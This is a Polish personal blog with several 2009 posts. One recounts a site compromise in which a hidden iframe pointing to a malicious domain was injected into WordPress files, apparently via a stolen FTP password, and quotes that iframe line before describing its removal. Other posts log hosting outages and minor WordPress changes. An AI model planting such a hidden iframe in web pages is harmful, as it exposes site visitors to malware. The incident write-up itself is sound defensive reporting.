W dniu wczorajszym wiele osób, które na mojego bloga zaglądają mogły się zdziwić widząc komunikat, że strona została uznana za niebezpieczną i może linkować do niebezpiecznego oprogramowania (czyt. wirusów). Wy się zdziwiliście… A co ja miałem powiedzieć? Pomyślałem sobie, najpierw Windows XP na blaszaku ugiął się pod naporem wirusów, a teraz jeszcze bloga nie chcą mi oszczędzić… WTF?! Ale cóż, stało się… Najprawdopodobniej sam się przyczyniłem do tego, że ktoś wstrzyknął mi na stronę kod, który linkował do jl.chura.pl/rc/ (celowo tutaj nie stworzyłem linka, aby nie kusić do wchodzenia na stronę, bowiem na 100% skończy się to zainfekowaniem systemu).

Jak to się stało, że ktoś był w stanie wstrzyknąć szkodliwy fragment kodu do mojej strony. Myślę, a nawet jestem pewien, że za cały incydent odpowiada Total Commander, z którego korzystałem do wymiany plików pomiędzy serwerem hostującym moją stronę, a twardym dyskiem mojego komputera po protokole FTP. Moim błędem, było stworzenie profilu w Total Commanderze do łączenia się z serwerem FTP cba.pl (to akurat rzecz normalnie stosowana i raczej nie niosąca żadnego niebezpieczeństwa) i zapisanie na stałe w profilu hasła do tegoż serwera (i tutaj powinienem się wstydzić, bo jako doświadczonemu użytkownikowi komputera, takich błędów nie wypada robić). Okazuje się, że nie należy ignorować informacji płynących z portali internetowych zajmujących się bezpieczeństwem sieci. Ja niestety zignorowałem komunikat o poważnej luce w Total Commanderze i doigrałem się – hasła zostały wykradzione.

Na trop fragmentu kodu naprowadził mnie raport z „Narzędzi dla webmasterów” udostępnionych przez Google. W raporcie było wyraźnie zaznaczone, że blog linkuje do domeny chura.pl, która jest uznana za niebezpieczną. Cóż, nie pozostało mi nic innego jak przeszukać zawartość plików WordPressa pod kątem zawartości tekstu z ciągiem znaków chura.pl.

Pomocnym narzędziem okazało się rozszerzenie do Firefoksa o nazwie Firebug. Jest to narzędzie, które pozwala przede wszystkim na podgląd kodu strony aktualnie wyświetlanej w przeglądarce internetowej. Skorzystałem z narzędzia wyszukiwania tekstu (wbudowane w Firebuga) i znalazłem. Znalazłem kod, który wyglądał jak poniżej:

<iframe src=”http://jL.chura.pl/rc/” style=”display:none”></iframe>

Jak już zlokalizowałem konkretny fragment kodu za pomocą Firebuga, nie było problemu z usunięciem wstrzykniętego kodu z plików WordPressa. Po dokładnym przeanalizowaniu całości kodu i upewnieniu się, że już nic więcej niepowołanego w nim nie siedzi, zgłosiłem do Google ponowną prośbę o przeanalizowanie strony pod kątem bezpieczeństwa dla odwiedzających. O godzinie 6:00 w poniedziałek (19.06.2009) blog wrócił do sieci już nie obarczony komunikatem o potencjalnym niebezpieczeństwie.

Ja sam pozmieniałem hasła dostępu do wszystkich serweró, które współtworzą infrastrukturę, na której jest mój blog oparty (FTP, MySQL) i oczywiście wykasowałem (i już nie będę zapisywał) z profilów Total Commandera wszelkie hasła. Pragnę również zapewnić wszystkich, że dołożę wszelkich starań, aby odwiedzanie mojego bloga było bezpieczne i nie groziło złapaniem jakiegoś świństwa.

Nie muszę nawiązywać do wcześniejszej informacji o niedostępności serwerów cba.pl (z 19.04.2009), ponieważ jest ona zamieszczona tuż pod tym wpisem. Dzisiaj również pojawiły się problemy z dostępem do bloga. Tym razem jednak postanowiłem bliżej przyjrzeć się tematowi i skontaktowałem się z jednym z administratorów forum cba.pl z prośbą o wyjaśnienie całej sytuacji. Jak się okazało, temat jest znany i tak napradę administratorzy starają się go rozwiązać już od dłuższego czasu. Problemem tak naprawdę ogromna popularność darmowego hostingu cba.pl, a co za tym idzie, serwery po prostu nie wytrzymują obciążenia. W tej chwili hosting jest uzbrajany w nowy, wydajniejszy sprzęt i stąd też pojawiają się przerwy w dostępie do serwisu.

W tej sytuacji wstrzymuje się z przeniesieniem bloga na płatny hosting, ponieważ chciałem przetestować wydajność nowych serwerów cba.pl. Jeżeli problemów będzie znacznie mniej, zostanę tutaj na dłużej, gdyż nowe funkcjonalności, które miałem zamiar wdrożyć na blogu, a które wymagają implementacji dodatkowych funkcji na serwerach, mogą poczekać, ponieważ na tą chwilę mało kto by z nich korzystał. Przyznam się również, że nie ma zbytnio czasu na siedzenie nad tymi funkcjami.

W dniu wczorajszym zapewne mieliście problemy z przeglądaniem mojego bloga. Ciężko mi powiedzieć jak długo te problemy trwały, ponieważ ja zorientowałem się, że jest coś nie tak około godziny 01:00 w nocy z soboty na niedzielę. Wcześniej niestety nie miałem na to szans, ponieważ pracowałem. Serwery mojego dostawcy hostingu nie były widoczne w sieci. Nie dochodziły pingi, ani do mojej subdomeny, ani też do głównej domeny hostingu.

Przepraszam was serdecznie za te niedogodności i zapewniam, że jest to kolejny impuls do jak najszybszej zmiany hostingu. Myślę, że nastąpi to już po weekendzie majowym.

Póki co, życze przyjemnej lektury.

Pomyślałem, że w cyklach tygodniowych będę zamieszczał artykuł, w którym będę publikował „log” zmian jakie zostały wprowadzone w moim blogu. Robię to z myślą o leniwych, którzy nie zaglądają tutaj.

No to lecimy:

15.04.2009

Zainstalowałem kolejną wtyczkę, która umożliwiła mi dodawanie do publikacji filmów z YouTube. Wtyczka nazywa się Viper’s Video Quicktags. Pierwszy efekt jej działania można zobaczyć w tym artykule.

Blog doczekał się wreszcie swojego logo. Favicona również się zmieniła.

12-13.04.2009

Cóż w dniu dzisiejszym dosyć ostro wziąłem się za testowanie ustawień bloga. Zdaje się, że zmienię skórkę, ponieważ znalazłem bardzo fajny i czytelny zamiennik dla tej, która w tym momencie funkcjonuje.

Ponadto znalazłem bardzo ciekawy pakiet oprogramowania, które emuluje mi serwer Apache i MySQL w środowisku Windows XP. Nazywa się VertrigoServ i jest dużo lepszy od KrasnalServ, który służył mi do tej pory. VertrigoServ może się pochwalić tym, że dysponuje najnowszymi wersjami części składowych środowiska, co przy testowaniu WordPress ma spore znaczenie.

Jest nieźle. Myślę, że już niedługo markasblog stanie na płatnym hostingu, po raz kolejny w odnowionej szacie, ale będą to zmiany jak najbardziej na plus.

07.04.2009

Blog doczekał się favicon.

29.03.2009

Oprócz testów nowego hostingu na linuxpl wprowadzam wciąż pewne zmiany w blogu opartym na hostingu cba. I tak w dniu dzisiejszym wydłużyłem listę ostatnich wpisów w sidebarze z trzech do ośmiu.

25.03.2009

Jest pierwszy plus zmiany hostingu. Podczas pisania publikacji działa sprawdzanie pisowni. Co to oznacza? Biblioteka curl jest i działa prawidłowo.

Z innych zmian to fakt, że w tym momencie markasblog jest testowany na zaktualizowanym silniku WordPress w wersji 2.7.1. Zastanawiam się nad aktualizacją silnika na hostingu cba.pl.

24.03.2009

Testy nowego hostingu rozpoczęte.

Pierwsze podejście do uruchomienia OpenID już za mną. Niestety na tą chwilę usługa nie działa mimo, że mam już dostęp do bibliotek, których nie miałem na cba.pl. Jestem jednak dobrej myśli, bo postęp jest:-)

10.03.2009

Powstała strona “Zmiany na blogu”. Zmiany i poprawki na blogu nie będą już temat publikacji na stronie głównej.

Usunąłem z pliku header.php znajdującego się w katalogu aktualnej kompozycji następujący fragment kodu:

<div class=”subscribe”>
<span class=”rss”><a href=”<?php bloginfo(’rss2_url’); ?>”><img src=”<?php bloginfo(’template_url’); ?>/images/rss.gif”></img></a></span>
</div>

Dzięki temu z nagłówka zniknął link do kanałów RSS.

06.03.2009

Zmiany, zmiany. Oby starczyło mi chęci na większość publikacji, bo jak narazie to tylko zmieniam szczegóły w funkcjonalności bloga. Do rzeczy jednak.

Zrezygnowałem z funkcji more w publikacjach, przez co artykuł będzie wyświetlany w całości już na stronie głównej. Nie będzie potrzeby klikania na “Czytaj dalej>>”. W końcu każda myszka jest przewidziana tylko na około 5 milionów kliknięć:-)

05.03.2009

Postanowiłem w dniu dzisiejszym popracować nad dodaniem funkcji logowania się poprzez identyfikator OpenID. Niestety po 5 minutach szukania i zbierania informacji o możliwościach implementacji tej usługi na moim blogu zostałem sprowadzony na ziemię.

Aby tego dokonać muszę zmienić dostawcę usług hostingowych, ponieważ cba.pl nie ma możliwości doinstalowania biblioteki curl na swoich serwerach, a nawet jeżeli ma taką możliwość, to na tą chwilę nie chce tego zrobić.

W tym momencie zastanawiam się nad zmianą hostingu. Być może zdecyduje się na jakąś płatną usługę. Na tą chwilę prace nad OpenID zawieszam, ale nie na długo.

W wolnej chwili wyedytowałem plik widgets.php znajdujący się w katalogu wp-includes, który w silniku WordPress jest odpowiedzialny za obsługę Widżetów. W ten sposób pozbyłem się zdublowanych linków z widżetu Meta i Linki.

Przy okazji edycji tego wpisu zauważyłem, że w panelu administracyjnym nie działa sprawdzanie pisowni.Pojawia się następujący błąd:

Error response: Could not open SSL connection to google.{”id”:null,”result”:[],”error”:null}

W dniu dzisiejszym mogliście mieć spory problem z przeglądaniem zasobów tego bloga. Sam również próbuję opublikować ten artykuł od ładnych kilku godzin. Niestety hosting na cba.pl coraz częściej zawodzi. Długości pingów nie da się najczęściej sprawdzić, ponieważ każda próba kończy się komunikatem o niepowodzeniu w nawiązywaniu połączenia z serwerem.

Pingi do markasblog.pl nie dochodziły

Przeglądarka zwracała znienawidzony przez wielu komunikat

Mimo, że jestem osobą nad wyraz cierpliwą, w dniu dzisiejszym zacząłem szukać alternatywy dla cba.pl. Przyznam, że od razu zainteresowałem się płatnymi usługami. Po kilku godzinach czytania opinii o dostawcach hostingu, rejestracji domen itp., wybór padł na płatny hosting linuxpl.com. Dlaczego akurat ta usługa? Z opisu wynika, że spełnia wszystkie moje wymogi. Ma przede wszystkim zaimplementowaną bibliotekę curl w PHP. Pamiętacie temat OpenID ? Jeżeli wszystko zagra, OpenID powinno zacząć funkcjonować na markasblog.

W tym momencie zarejestrowałem się na 14-dniowy okres testowy, więc póki co blog będzie działał na serwerach cba.pl, ale już niedługo postaram się go przenieść na nowe sewery. Adres bloga również też się zmieni i myślę, że umieszczę go w domenie markasblog.pl lub markasblog.com.pl. Akurat to jest najmniejszy problem.

W takim razie ja zabieram się do testów nowego hostingu